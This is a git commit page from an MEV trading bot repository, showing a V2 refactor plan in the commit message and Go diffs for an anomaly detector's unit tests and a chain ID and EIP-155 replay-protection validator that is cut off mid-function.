feat: create v2-prep branch with comprehensive planning

Restructured project for V2 refactor:

**Structure Changes:**
- Moved all V1 code to orig/ folder (preserved with git mv)
- Created docs/planning/ directory
- Added orig/README_V1.md explaining V1 preservation

**Planning Documents:**
- 00_V2_MASTER_PLAN.md: Complete architecture overview
  - Executive summary of critical V1 issues
  - High-level component architecture diagrams
  - 5-phase implementation roadmap
  - Success metrics and risk mitigation

- 07_TASK_BREAKDOWN.md: Atomic task breakdown
  - 99+ hours of detailed tasks
  - Every task < 2 hours (atomic)
  - Clear dependencies and success criteria
  - Organized by implementation phase

**V2 Key Improvements:**
- Per-exchange parsers (factory pattern)
- Multi-layer strict validation
- Multi-index pool cache
- Background validation pipeline
- Comprehensive observability

**Critical Issues Addressed:**
- Zero address tokens (strict validation + cache enrichment)
- Parsing accuracy (protocol-specific parsers)
- No audit trail (background validation channel)
- Inefficient lookups (multi-index cache)
- Stats disconnection (event-driven metrics)

Next Steps:
1. Review planning documents
2. Begin Phase 1: Foundation (P1-001 through P1-010)
3. Implement parsers in Phase 2
4. Build cache system in Phase 3
5. Add validation pipeline in Phase 4
6. Migrate and test in Phase 5

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude <noreply@anthropic.com>
This commit is contained in:
Administrator
2025-11-10 10:14:26 +01:00
parent 1773daffe7
commit 803de231ba
411 changed files with 20390 additions and 8680 deletions

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,630 @@
package security
import (
	"fmt"
	"math"
	"testing"
	"time"

	"github.com/ethereum/go-ethereum/common"
	"github.com/stretchr/testify/assert"

	"github.com/fraktal/mev-beta/internal/logger"
)
// TestNewAnomalyDetector verifies constructor behavior with both the
// built-in default configuration and a caller-supplied one.
func TestNewAnomalyDetector(t *testing.T) {
	log := logger.New("info", "text", "")

	// Nil config must fall back to defaults (Z-score threshold 2.5).
	defaultAD := NewAnomalyDetector(log, nil)
	assert.NotNil(t, defaultAD)
	assert.NotNil(t, defaultAD.config)
	assert.Equal(t, 2.5, defaultAD.config.ZScoreThreshold)

	// A custom config must be adopted verbatim.
	cfg := &AnomalyConfig{
		ZScoreThreshold:       3.0,
		VolumeThreshold:       4.0,
		BaselineWindow:        12 * time.Hour,
		EnableVolumeDetection: false,
	}
	customAD := NewAnomalyDetector(log, cfg)
	assert.NotNil(t, customAD)
	assert.Equal(t, 3.0, customAD.config.ZScoreThreshold)
	assert.Equal(t, 4.0, customAD.config.VolumeThreshold)
	assert.Equal(t, 12*time.Hour, customAD.config.BaselineWindow)
	assert.False(t, customAD.config.EnableVolumeDetection)
}
// TestAnomalyDetectorStartStop checks that Start and Stop toggle the running
// flag and are idempotent when called twice in a row.
func TestAnomalyDetectorStartStop(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	// First Start succeeds and flips the running flag.
	assert.NoError(t, detector.Start())
	assert.True(t, detector.running)
	// A second Start while running must not error.
	assert.NoError(t, detector.Start())

	// First Stop succeeds and clears the running flag.
	assert.NoError(t, detector.Stop())
	assert.False(t, detector.running)
	// A second Stop while stopped must not error.
	assert.NoError(t, detector.Stop())
}
// TestRecordMetric feeds a series of values into one metric and verifies
// that a baseline pattern with sane statistics is created for it.
func TestRecordMetric(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	const metricName = "test_metric"
	samples := []float64{10.0, 12.0, 11.0, 13.0, 9.0, 14.0, 10.5, 11.5}
	for _, sample := range samples {
		detector.RecordMetric(metricName, sample)
	}

	// Snapshot the pattern under the read lock.
	detector.mu.RLock()
	pattern, exists := detector.patterns[metricName]
	detector.mu.RUnlock()

	assert.True(t, exists)
	assert.NotNil(t, pattern)
	assert.Equal(t, metricName, pattern.MetricName)
	assert.Equal(t, len(samples), len(pattern.Observations))
	assert.Greater(t, pattern.Mean, 0.0)
	assert.Greater(t, pattern.StandardDev, 0.0)
}
// TestRecordTransaction records a single transaction and confirms it is
// appended to the log with a positive anomaly score attached.
func TestRecordTransaction(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	tx := &TransactionRecord{
		Hash:        common.HexToHash("0x123"),
		From:        common.HexToAddress("0xabc"),
		To:          &common.Address{},
		Value:       1.5,
		GasPrice:    20.0,
		GasUsed:     21000,
		Timestamp:   time.Now(),
		BlockNumber: 12345,
		Success:     true,
	}
	detector.RecordTransaction(tx)

	// Verify the log contents under the read lock.
	detector.mu.RLock()
	defer detector.mu.RUnlock()
	assert.Equal(t, 1, len(detector.transactionLog))
	assert.Equal(t, tx.Hash, detector.transactionLog[0].Hash)
	assert.Greater(t, detector.transactionLog[0].AnomalyScore, 0.0)
}
// TestPatternStatistics runs updatePatternStatistics over a known sequence
// (1..10) and checks mean, min, max, spread, and percentile population.
func TestPatternStatistics(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	baseline := &PatternBaseline{
		MetricName:       "test",
		Observations:     []float64{1, 2, 3, 4, 5, 6, 7, 8, 9, 10},
		Percentiles:      make(map[int]float64),
		SeasonalPatterns: make(map[string]float64),
	}
	detector.updatePatternStatistics(baseline)

	// Known values for the 1..10 sequence.
	assert.Equal(t, 5.5, baseline.Mean)
	assert.Equal(t, 1.0, baseline.Min)
	assert.Equal(t, 10.0, baseline.Max)
	assert.Greater(t, baseline.StandardDev, 0.0)
	assert.Greater(t, baseline.Variance, 0.0)

	// The median and tail percentiles must be present.
	assert.NotEmpty(t, baseline.Percentiles)
	assert.Contains(t, baseline.Percentiles, 50)
	assert.Contains(t, baseline.Percentiles, 95)
}
// TestZScoreCalculation drives calculateZScore through points at known
// distances from the mean, plus the zero-standard-deviation guard.
func TestZScoreCalculation(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	baseline := &PatternBaseline{Mean: 10.0, StandardDev: 2.0}

	cases := []struct {
		value    float64
		expected float64
	}{
		{value: 10.0, expected: 0.0},  // exactly at the mean
		{value: 12.0, expected: 1.0},  // one std dev above
		{value: 8.0, expected: -1.0},  // one std dev below
		{value: 16.0, expected: 3.0},  // three std devs above
		{value: 4.0, expected: -3.0},  // three std devs below
	}
	for _, c := range cases {
		got := detector.calculateZScore(c.value, baseline)
		assert.Equal(t, c.expected, got, "Z-score for value %.1f", c.value)
	}

	// Degenerate baseline: zero std dev must yield 0, not a division error.
	baseline.StandardDev = 0
	assert.Equal(t, 0.0, detector.calculateZScore(15.0, baseline))
}
// TestAnomalyDetection builds a statistical baseline for one metric and then
// submits a value far outside it, asserting that a statistical anomaly alert
// arrives on the alerts channel within the timeout.
func TestAnomalyDetection(t *testing.T) {
	logger := logger.New("info", "text", "")
	config := &AnomalyConfig{
		ZScoreThreshold:        2.0,
		VolumeThreshold:        2.0,
		EnableVolumeDetection:  true,
		EnableBehavioralAD:     true,
		EnablePatternDetection: true,
	}
	ad := NewAnomalyDetector(logger, config)
	// Build baseline with normal values
	normalValues := []float64{100, 105, 95, 110, 90, 115, 85, 120, 80, 125}
	for _, value := range normalValues {
		ad.RecordMetric("transaction_value", value)
	}
	// Record anomalous value
	anomalousValue := 500.0 // Way above normal
	ad.RecordMetric("transaction_value", anomalousValue)
	// Check if alert was generated; the select gives detection up to 100ms
	// before failing the test.
	select {
	case alert := <-ad.GetAlerts():
		assert.NotNil(t, alert)
		assert.Equal(t, AnomalyTypeStatistical, alert.Type)
		assert.Equal(t, "transaction_value", alert.MetricName)
		assert.Equal(t, anomalousValue, alert.ObservedValue)
		// Score must exceed the configured 2.0 Z-score threshold.
		assert.Greater(t, alert.Score, 2.0)
	case <-time.After(100 * time.Millisecond):
		t.Error("Expected anomaly alert but none received")
	}
}
// TestVolumeAnomalyDetection builds a baseline of normal-value transactions
// and then submits one with a far larger value, accepting either a volume
// alert or (with a thin baseline) no alert at all.
func TestVolumeAnomalyDetection(t *testing.T) {
	log := logger.New("info", "text", "")
	config := &AnomalyConfig{
		VolumeThreshold:       2.0,
		EnableVolumeDetection: true,
	}
	detector := NewAnomalyDetector(log, config)

	// Build baseline. The hashes use fmt.Sprintf: the previous
	// "0x"+string(rune(i)) form produced control characters that are not
	// valid hex, so every record collapsed onto the zero hash.
	for i := 0; i < 20; i++ {
		record := &TransactionRecord{
			Hash:      common.HexToHash(fmt.Sprintf("0x%x", i)),
			From:      common.HexToAddress("0x123"),
			Value:     1.0, // Normal value
			GasPrice:  20.0,
			Timestamp: time.Now(),
		}
		detector.RecordTransaction(record)
	}

	// Record a transaction with a value ~50x the baseline.
	anomalousRecord := &TransactionRecord{
		Hash:      common.HexToHash("0xanomaly"),
		From:      common.HexToAddress("0x456"),
		Value:     50.0, // Much higher than normal
		GasPrice:  20.0,
		Timestamp: time.Now(),
	}
	detector.RecordTransaction(anomalousRecord)

	// Check for an alert; silence is tolerated because volume detection may
	// legitimately decline to fire on an insufficient baseline.
	select {
	case alert := <-detector.GetAlerts():
		assert.NotNil(t, alert)
		assert.Equal(t, AnomalyTypeVolume, alert.Type)
		assert.Equal(t, 50.0, alert.ObservedValue)
	case <-time.After(100 * time.Millisecond):
		// Acceptable: no alert with an insufficient baseline.
	}
}
// TestBehavioralAnomalyDetection establishes a per-sender gas-price baseline
// and then submits a 10x gas-price jump from the same sender, accepting
// either a behavioral alert or (with limited history) no alert.
func TestBehavioralAnomalyDetection(t *testing.T) {
	log := logger.New("info", "text", "")
	config := &AnomalyConfig{
		EnableBehavioralAD: true,
	}
	detector := NewAnomalyDetector(log, config)

	sender := common.HexToAddress("0x123")
	// Build the sender's baseline. fmt.Sprintf gives each record a distinct
	// valid hex hash; the previous "0x"+string(rune(i)) form produced
	// non-hex control characters that all decoded to the zero hash.
	for i := 0; i < 10; i++ {
		record := &TransactionRecord{
			Hash:      common.HexToHash(fmt.Sprintf("0x%x", i)),
			From:      sender,
			Value:     1.0,
			GasPrice:  20.0, // Normal gas price
			Timestamp: time.Now(),
		}
		detector.RecordTransaction(record)
	}

	// Submit a gas price 10x the sender's baseline.
	anomalousRecord := &TransactionRecord{
		Hash:      common.HexToHash("0xanomaly"),
		From:      sender,
		Value:     1.0,
		GasPrice:  200.0, // 10x higher gas price
		Timestamp: time.Now(),
	}
	detector.RecordTransaction(anomalousRecord)

	// Check for an alert; behavioral detection may need more history, so a
	// quiet timeout is acceptable behavior.
	select {
	case alert := <-detector.GetAlerts():
		assert.NotNil(t, alert)
		assert.Equal(t, AnomalyTypeBehavioral, alert.Type)
		assert.Equal(t, sender.Hex(), alert.Source)
	case <-time.After(100 * time.Millisecond):
		// Acceptable: detection may not trigger immediately.
	}
}
// TestSeverityCalculation maps representative Z-scores onto the four
// severity buckets.
func TestSeverityCalculation(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	cases := []struct {
		zScore   float64
		expected AnomalySeverity
	}{
		{zScore: 1.5, expected: AnomalySeverityLow},
		{zScore: 2.5, expected: AnomalySeverityMedium},
		{zScore: 3.5, expected: AnomalySeverityHigh},
		{zScore: 4.5, expected: AnomalySeverityCritical},
	}
	for _, c := range cases {
		got := detector.calculateSeverity(c.zScore)
		assert.Equal(t, c.expected, got, "Severity for Z-score %.1f", c.zScore)
	}
}
// TestConfidenceCalculation bounds-checks calculateConfidence across a range
// of Z-scores and sample sizes: the result must stay inside [min, max].
func TestConfidenceCalculation(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	cases := []struct {
		zScore     float64
		sampleSize int
		minConf    float64
		maxConf    float64
	}{
		{zScore: 2.0, sampleSize: 10, minConf: 0.0, maxConf: 1.0},
		{zScore: 5.0, sampleSize: 100, minConf: 0.5, maxConf: 1.0},
		{zScore: 1.0, sampleSize: 200, minConf: 0.0, maxConf: 1.0},
	}
	for _, c := range cases {
		got := detector.calculateConfidence(c.zScore, c.sampleSize)
		assert.GreaterOrEqual(t, got, c.minConf)
		assert.LessOrEqual(t, got, c.maxConf)
	}
}
// TestTrendCalculation checks the sign of the computed trend for rising,
// falling, and flat series, plus the empty/single-element edge cases.
func TestTrendCalculation(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	// Monotonically increasing data must yield a positive trend.
	assert.Greater(t, detector.calculateTrend([]float64{1, 2, 3, 4, 5}), 0.0)

	// Monotonically decreasing data must yield a negative trend.
	assert.Less(t, detector.calculateTrend([]float64{5, 4, 3, 2, 1}), 0.0)

	// Constant data has no trend.
	assert.Equal(t, 0.0, detector.calculateTrend([]float64{5, 5, 5, 5, 5}))

	// Degenerate inputs: empty and single-element series are trendless.
	assert.Equal(t, 0.0, detector.calculateTrend([]float64{}))
	assert.Equal(t, 0.0, detector.calculateTrend([]float64{5}))
}
// TestAnomalyReport seeds the detector with two metrics and one transaction,
// then verifies GetAnomalyReport reflects that state.
func TestAnomalyReport(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	// Seed two metric patterns and one transaction.
	detector.RecordMetric("test_metric1", 10.0)
	detector.RecordMetric("test_metric2", 20.0)
	detector.RecordTransaction(&TransactionRecord{
		Hash:      common.HexToHash("0x123"),
		From:      common.HexToAddress("0xabc"),
		Value:     1.0,
		Timestamp: time.Now(),
	})

	// The report must account for everything recorded above.
	report := detector.GetAnomalyReport()
	assert.NotNil(t, report)
	assert.Greater(t, report.PatternsTracked, 0)
	assert.Greater(t, report.TransactionsAnalyzed, 0)
	assert.NotNil(t, report.PatternSummaries)
	assert.NotNil(t, report.SystemHealth)
	assert.NotZero(t, report.Timestamp)
}
// TestPatternSummaries records one rising metric and one flat metric, then
// validates the per-pattern summary fields and trend labels.
func TestPatternSummaries(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	// One strictly increasing metric...
	for _, v := range []float64{1.0, 2.0, 3.0, 4.0, 5.0} {
		detector.RecordMetric("increasing", v)
	}
	// ...and one flat metric.
	for i := 0; i < 3; i++ {
		detector.RecordMetric("stable", 10.0)
	}

	summaries := detector.getPatternSummaries()
	assert.NotEmpty(t, summaries)
	for name, summary := range summaries {
		assert.NotEmpty(t, summary.MetricName)
		assert.Equal(t, name, summary.MetricName)
		assert.GreaterOrEqual(t, summary.SampleCount, int64(0))
		assert.Contains(t, []string{"INCREASING", "DECREASING", "STABLE"}, summary.Trend)
	}
}
// TestSystemHealth sanity-checks the health snapshot of a fresh detector:
// all gauges non-negative and the overall status one of the known labels.
func TestSystemHealth(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	health := detector.calculateSystemHealth()
	assert.NotNil(t, health)
	assert.GreaterOrEqual(t, health.AlertChannelSize, 0)
	assert.GreaterOrEqual(t, health.ProcessingLatency, 0.0)
	assert.GreaterOrEqual(t, health.MemoryUsage, int64(0))
	assert.GreaterOrEqual(t, health.ErrorRate, 0.0)
	assert.Contains(t, []string{"HEALTHY", "WARNING", "DEGRADED", "CRITICAL"}, health.OverallHealth)
}
// TestTransactionHistoryLimit inserts twice as many transactions as the
// configured history cap and asserts the retained log never exceeds it.
func TestTransactionHistoryLimit(t *testing.T) {
	log := logger.New("info", "text", "")
	config := &AnomalyConfig{
		MaxTransactionHistory: 5, // Small limit for testing
	}
	detector := NewAnomalyDetector(log, config)

	// fmt.Sprintf gives each record a distinct valid hex hash; the previous
	// "0x"+string(rune(i)) form produced non-hex control characters that
	// all decoded to the zero hash.
	for i := 0; i < 10; i++ {
		detector.RecordTransaction(&TransactionRecord{
			Hash:      common.HexToHash(fmt.Sprintf("0x%x", i)),
			From:      common.HexToAddress("0x123"),
			Value:     float64(i),
			Timestamp: time.Now(),
		})
	}

	// The log must be trimmed to at most MaxTransactionHistory entries.
	detector.mu.RLock()
	defer detector.mu.RUnlock()
	assert.LessOrEqual(t, len(detector.transactionLog), config.MaxTransactionHistory)
}
// TestPatternHistoryLimit records more observations than the configured cap
// and asserts the pattern's retained observations are bounded by it.
func TestPatternHistoryLimit(t *testing.T) {
	log := logger.New("info", "text", "")
	config := &AnomalyConfig{
		MaxPatternHistory: 3, // Small limit for testing
	}
	detector := NewAnomalyDetector(log, config)

	const metricName = "test_metric"
	// Ten observations against a cap of three.
	for i := 0; i < 10; i++ {
		detector.RecordMetric(metricName, float64(i))
	}

	// Retained observations must not exceed the cap.
	detector.mu.RLock()
	defer detector.mu.RUnlock()
	pattern := detector.patterns[metricName]
	assert.LessOrEqual(t, len(pattern.Observations), config.MaxPatternHistory)
}
// TestTimeAnomalyScore probes calculateTimeAnomalyScore at three times of
// day: business hours (no suspicion), late night (high), evening (medium).
func TestTimeAnomalyScore(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	// 2 PM UTC: business hours, score must be zero.
	score := detector.calculateTimeAnomalyScore(time.Date(2023, 1, 1, 14, 0, 0, 0, time.UTC))
	assert.Equal(t, 0.0, score)

	// 2 AM UTC: late night, score must exceed 0.5.
	score = detector.calculateTimeAnomalyScore(time.Date(2023, 1, 1, 2, 0, 0, 0, time.UTC))
	assert.Greater(t, score, 0.5)

	// 8 PM UTC: evening, score must sit strictly between 0 and 0.5.
	score = detector.calculateTimeAnomalyScore(time.Date(2023, 1, 1, 20, 0, 0, 0, time.UTC))
	assert.Greater(t, score, 0.0)
	assert.Less(t, score, 0.5)
}
// TestSenderFrequencyCalculation records five recent and one stale
// transaction from one sender, then asserts only the recent ones count
// toward the sender's frequency.
func TestSenderFrequencyCalculation(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	sender := common.HexToAddress("0x123")
	now := time.Now()

	// Five transactions inside the frequency window. fmt.Sprintf gives each
	// a distinct valid hex hash; the previous "0x"+string(rune(i)) form
	// produced non-hex control characters that all decoded to the zero hash.
	for i := 0; i < 5; i++ {
		detector.RecordTransaction(&TransactionRecord{
			Hash:      common.HexToHash(fmt.Sprintf("0x%x", i)),
			From:      sender,
			Value:     1.0,
			Timestamp: now.Add(-time.Duration(i) * time.Minute),
		})
	}

	// A two-hour-old transaction must fall outside the window.
	detector.RecordTransaction(&TransactionRecord{
		Hash:      common.HexToHash("0xold"),
		From:      sender,
		Value:     1.0,
		Timestamp: now.Add(-2 * time.Hour),
	})

	// Only the five recent transactions should be counted.
	assert.Equal(t, 5.0, detector.calculateSenderFrequency(sender))
}
// TestAverageGasPriceCalculation checks the mean gas price over a small set
// of records and the empty-input guard.
func TestAverageGasPriceCalculation(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	// 10, 20, 30 averages to 20.
	records := []*TransactionRecord{
		{GasPrice: 10.0},
		{GasPrice: 20.0},
		{GasPrice: 30.0},
	}
	assert.Equal(t, 20.0, detector.calculateAverageGasPrice(records))

	// No records: the average must be zero, not NaN.
	assert.Equal(t, 0.0, detector.calculateAverageGasPrice([]*TransactionRecord{}))
}
// TestMeanAndStdDevCalculation verifies calculateMean and calculateStdDev on
// the sequence 1..5 (mean 3, population std dev sqrt(2)) and on empty input.
func TestMeanAndStdDevCalculation(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	samples := []float64{1, 2, 3, 4, 5}

	mean := detector.calculateMean(samples)
	assert.Equal(t, 3.0, mean)

	// Population standard deviation of 1..5 is sqrt(2).
	stdDev := detector.calculateStdDev(samples, mean)
	assert.InDelta(t, math.Sqrt(2.0), stdDev, 0.001)

	// Empty input must yield zeros, not NaN.
	assert.Equal(t, 0.0, detector.calculateMean([]float64{}))
	assert.Equal(t, 0.0, detector.calculateStdDev([]float64{}, 0.0))
}
// TestAlertGeneration covers the three alert text helpers: unique IDs,
// human-readable descriptions, and remediation recommendations.
func TestAlertGeneration(t *testing.T) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	// IDs must be unique and carry the "anomaly_" prefix.
	first := detector.generateAlertID()
	second := detector.generateAlertID()
	assert.NotEqual(t, first, second)
	assert.Contains(t, first, "anomaly_")

	// The description embeds metric name, observed value, mean, and Z-score.
	baseline := &PatternBaseline{Mean: 10.0}
	desc := detector.generateAnomalyDescription("test_metric", 15.0, baseline, 2.5)
	assert.Contains(t, desc, "test_metric")
	assert.Contains(t, desc, "15.00")
	assert.Contains(t, desc, "10.00")
	assert.Contains(t, desc, "2.5")

	// High-score alerts must come with at least an investigation step.
	recommendations := detector.generateRecommendations("transaction_value", 3.5)
	assert.NotEmpty(t, recommendations)
	assert.Contains(t, recommendations[0], "investigation")
}
// BenchmarkRecordTransaction measures the cost of recording one transaction,
// reusing a single record so only RecordTransaction is timed.
func BenchmarkRecordTransaction(b *testing.B) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	sample := &TransactionRecord{
		Hash:      common.HexToHash("0x123"),
		From:      common.HexToAddress("0xabc"),
		Value:     1.0,
		GasPrice:  20.0,
		Timestamp: time.Now(),
	}

	b.ResetTimer()
	for n := 0; n < b.N; n++ {
		detector.RecordTransaction(sample)
	}
}
// BenchmarkRecordMetric measures the per-observation cost of RecordMetric.
func BenchmarkRecordMetric(b *testing.B) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	b.ResetTimer()
	for n := 0; n < b.N; n++ {
		detector.RecordMetric("test_metric", float64(n))
	}
}
// BenchmarkCalculateZScore measures the pure arithmetic cost of
// calculateZScore against a fixed baseline.
func BenchmarkCalculateZScore(b *testing.B) {
	log := logger.New("info", "text", "")
	detector := NewAnomalyDetector(log, nil)

	baseline := &PatternBaseline{Mean: 10.0, StandardDev: 2.0}

	b.ResetTimer()
	for n := 0; n < b.N; n++ {
		detector.calculateZScore(float64(n), baseline)
	}
}

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,499 @@
package security
import (
"fmt"
"math/big"
"sync"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
"github.com/fraktal/mev-beta/internal/logger"
)
// ChainIDValidator provides comprehensive chain ID validation and EIP-155 replay protection
type ChainIDValidator struct {
	logger               *logger.Logger
	expectedChainID      *big.Int              // the single chain ID this validator treats as a match
	allowedChainIDs      map[uint64]bool       // allowlist of acceptable chain IDs; guarded by mu
	replayAttackDetector *ReplayAttackDetector // cross-chain replay tracking; has its own mutex
	mu                   sync.RWMutex          // guards allowedChainIDs and the statistics below
	// Chain ID validation statistics
	validationCount    uint64    // total ValidateChainID invocations
	mismatchCount      uint64    // validations whose chain ID differed from expectedChainID
	replayAttemptCount uint64    // cross-chain replays flagged by detectReplayAttack
	lastMismatchTime   time.Time // wall-clock time of the most recent mismatch
}
// normalizeChainID resolves the effective chain ID for a transaction: the
// transaction's own chain ID when it carries a real one, otherwise the
// caller-supplied override, otherwise the validator's expected chain ID.
// The returned value is always a fresh copy.
func (cv *ChainIDValidator) normalizeChainID(txChainID *big.Int, override *big.Int) *big.Int {
	if isPlaceholderChainID(txChainID) {
		if override != nil {
			return new(big.Int).Set(override)
		}
		return new(big.Int).Set(cv.expectedChainID)
	}
	return new(big.Int).Set(txChainID)
}
func isPlaceholderChainID(id *big.Int) bool {
if id == nil || id.Sign() == 0 {
return true
}
// Treat extremely large values (legacy placeholder) as missing
if id.BitLen() >= 62 {
return true
}
return false
}
// ReplayAttackDetector tracks potential replay attacks
type ReplayAttackDetector struct {
	// Track transaction hashes across different chain IDs to detect replay attempts
	seenTransactions map[string]ChainIDRecord // keyed by createTransactionIdentifier output; guarded by mu
	maxTrackingTime  time.Duration            // records older than this are purged by cleanOldTrackingData
	mu               sync.Mutex
}
// ChainIDRecord stores information about a transaction's chain ID usage
type ChainIDRecord struct {
	ChainID        uint64         // chain the identifier was most recently seen on
	FirstSeen      time.Time      // when this identifier was first observed
	Count          int            // how many times the identifier has been seen
	From           common.Address // sender associated with the identifier
	AlertTriggered bool           // whether a cross-chain replay alert was already raised
}
// ChainValidationResult contains comprehensive chain ID validation results
type ChainValidationResult struct {
	Valid             bool                   `json:"valid"`              // overall pass/fail verdict
	ExpectedChainID   uint64                 `json:"expected_chain_id"`  // chain ID the validator is configured for
	ActualChainID     uint64                 `json:"actual_chain_id"`    // normalized chain ID taken from the transaction
	IsEIP155Protected bool                   `json:"is_eip155_protected"` // whether the signature encodes the chain ID
	ReplayRisk        string                 `json:"replay_risk"` // NONE, LOW, MEDIUM, HIGH, CRITICAL
	Warnings          []string               `json:"warnings"`    // non-fatal findings
	Errors            []string               `json:"errors"`      // fatal findings; non-empty implies Valid == false
	SecurityMetadata  map[string]interface{} `json:"security_metadata"` // audit context (timestamps, counters, hashes)
}
// NewChainIDValidator creates a new chain ID validator configured for the
// given expected chain ID, with a default allowlist (Ethereum mainnet plus
// Arbitrum One and Sepolia) and a 24-hour replay-tracking window.
func NewChainIDValidator(logger *logger.Logger, expectedChainID *big.Int) *ChainIDValidator {
	allowed := map[uint64]bool{
		1:      true, // Ethereum mainnet (for testing)
		42161:  true, // Arbitrum One mainnet
		421614: true, // Arbitrum Sepolia testnet (for testing)
	}
	detector := &ReplayAttackDetector{
		seenTransactions: make(map[string]ChainIDRecord),
		maxTrackingTime:  24 * time.Hour, // Track for 24 hours
	}
	return &ChainIDValidator{
		logger:               logger,
		expectedChainID:      expectedChainID,
		allowedChainIDs:      allowed,
		replayAttackDetector: detector,
	}
}
// ValidateChainID performs comprehensive chain ID validation
//
// It normalizes the transaction's chain ID (falling back to overrideChainID
// or the configured expected chain ID when absent), then runs five checks:
// exact chain ID match, EIP-155 protection, the allowlist, replay-attack
// heuristics, and chain-specific rules. Findings accumulate into the
// returned result; statistics are updated under cv.mu, which is held for
// the duration of the call.
func (cv *ChainIDValidator) ValidateChainID(tx *types.Transaction, signerAddr common.Address, overrideChainID *big.Int) *ChainValidationResult {
	actualChainID := cv.normalizeChainID(tx.ChainId(), overrideChainID)
	result := &ChainValidationResult{
		Valid:            true,
		ExpectedChainID:  cv.expectedChainID.Uint64(),
		ActualChainID:    actualChainID.Uint64(),
		SecurityMetadata: make(map[string]interface{}),
	}
	cv.mu.Lock()
	defer cv.mu.Unlock()
	cv.validationCount++
	// 1. Basic Chain ID Validation
	if actualChainID.Uint64() != cv.expectedChainID.Uint64() {
		result.Valid = false
		result.Errors = append(result.Errors,
			fmt.Sprintf("Chain ID mismatch: expected %d, got %d",
				cv.expectedChainID.Uint64(), actualChainID.Uint64()))
		cv.mismatchCount++
		cv.lastMismatchTime = time.Now()
		// Log security alert
		cv.logger.Warn(fmt.Sprintf("SECURITY ALERT: Chain ID mismatch detected from %s - Expected: %d, Got: %d",
			signerAddr.Hex(), cv.expectedChainID.Uint64(), actualChainID.Uint64()))
	}
	// 2. EIP-155 Replay Protection Verification
	eip155Result := cv.validateEIP155Protection(tx, actualChainID)
	result.IsEIP155Protected = eip155Result.protected
	if !eip155Result.protected {
		result.Warnings = append(result.Warnings, "Transaction lacks EIP-155 replay protection")
		result.ReplayRisk = "HIGH"
	} else {
		result.ReplayRisk = "NONE"
	}
	// 3. Chain ID Allowlist Validation
	if !cv.allowedChainIDs[actualChainID.Uint64()] {
		result.Valid = false
		result.Errors = append(result.Errors,
			fmt.Sprintf("Chain ID %d is not in the allowed list", actualChainID.Uint64()))
		cv.logger.Error(fmt.Sprintf("SECURITY ALERT: Attempted transaction on unauthorized chain %d from %s",
			actualChainID.Uint64(), signerAddr.Hex()))
	}
	// 4. Replay Attack Detection
	// NOTE: this may escalate ReplayRisk above and beyond step 2's verdict;
	// only a CRITICAL finding invalidates the transaction outright.
	replayResult := cv.detectReplayAttack(tx, signerAddr, actualChainID.Uint64())
	if replayResult.riskLevel != "NONE" {
		result.ReplayRisk = replayResult.riskLevel
		result.Warnings = append(result.Warnings, replayResult.warnings...)
		if replayResult.riskLevel == "CRITICAL" {
			result.Valid = false
			result.Errors = append(result.Errors, "Potential replay attack detected")
		}
	}
	// 5. Chain-specific Validation
	chainSpecificResult := cv.validateChainSpecificRules(tx, actualChainID.Uint64())
	if !chainSpecificResult.valid {
		result.Errors = append(result.Errors, chainSpecificResult.errors...)
		result.Valid = false
	}
	result.Warnings = append(result.Warnings, chainSpecificResult.warnings...)
	// 6. Add security metadata
	result.SecurityMetadata["validation_timestamp"] = time.Now().Unix()
	result.SecurityMetadata["total_validations"] = cv.validationCount
	result.SecurityMetadata["total_mismatches"] = cv.mismatchCount
	result.SecurityMetadata["signer_address"] = signerAddr.Hex()
	result.SecurityMetadata["transaction_hash"] = tx.Hash().Hex()
	// Log validation result for audit
	if !result.Valid {
		cv.logger.Error(fmt.Sprintf("Chain validation FAILED for tx %s from %s: %v",
			tx.Hash().Hex(), signerAddr.Hex(), result.Errors))
	}
	return result
}
// EIP155Result contains EIP-155 validation results
type EIP155Result struct {
	protected bool     // true when the signature encodes the chain ID per EIP-155
	chainID   uint64   // chain ID the check was performed against
	warnings  []string // non-fatal findings (missing chain ID, legacy v, invalid v)
}
// validateEIP155Protection verifies EIP-155 replay protection is properly implemented.
//
// For legacy transactions it checks the signature's v value against the
// EIP-155 form v = CHAIN_ID*2 + 35/36. Typed transactions (EIP-2930/1559
// and later) carry their v as a 0/1 y-parity and embed the chain ID in the
// signed payload, so they are replay-protected by construction — the legacy
// v check would falsely flag every one of them as unprotected.
func (cv *ChainIDValidator) validateEIP155Protection(tx *types.Transaction, normalizedChainID *big.Int) EIP155Result {
	result := EIP155Result{
		protected: false,
		warnings:  make([]string, 0),
	}
	// Typed transactions include the chain ID in the signed payload and are
	// therefore replay-protected; skip the legacy v-value arithmetic.
	if tx.Type() != types.LegacyTxType {
		result.protected = true
		result.chainID = normalizedChainID.Uint64()
		return result
	}
	// Check if transaction has a valid chain ID (EIP-155 requirement)
